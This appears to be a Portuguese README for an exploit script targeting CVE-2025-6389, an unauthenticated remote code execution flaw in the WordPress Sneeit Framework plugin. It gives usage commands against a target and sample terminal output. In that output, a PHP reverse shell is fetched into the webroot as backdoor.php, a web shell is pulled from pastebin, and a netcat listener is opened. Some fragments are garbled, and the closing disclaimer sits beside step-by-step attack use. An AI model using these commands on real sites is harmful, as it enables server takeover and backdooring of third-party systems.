
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 é uma vulnerabilidade Crítica (CVSS 9.8) no plugin Sneeit Framework do WordPress (≤ 8.3), amplamente utilizado por temas populares. Ela permite execução remota de código sem autenticação — a classe mais perigosa de vulnerabilidades web.
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)Use isso apenas em alvos que você está oficialmente autorizado a testar (escopo claro + RoE).
A vulnerabilidade ainda está sendo fortemente explorada na natureza agora.
Aqui está exatamente o que você verá no seu terminal quando o exploit realmente funcionar (exploração 100% bem-sucedida do CVE-2025-6389 em um alvo vulnerável executando Sneeit Framework ≤ 8.3):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
Então, na sua própria máquina:
nc -lvnp 4444
→ Você instantaneamente obtém um reverse shell totalmente interativo como www-data.
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
Você sabe que funcionou quando vê qualquer um destes:
É isso. Se você obtiver qualquer um dos itens acima → RCE total sem autenticação alcançado.
Cole sua saída exata aqui se quiser que eu confirme 100% se funcionou ou não.
sneeit_articles_pagination_callback()call_user_func() → execução arbitrária de códigoEsta informação é fornecida apenas para fins defensivos e educacionais 🛡️. Não a use para explorar sistemas que você não possui ou não tem permissão explícita para testar 🚫. Sempre siga as diretrizes legais e éticas ao trabalhar com vulnerabilidades de segurança ⚖️✨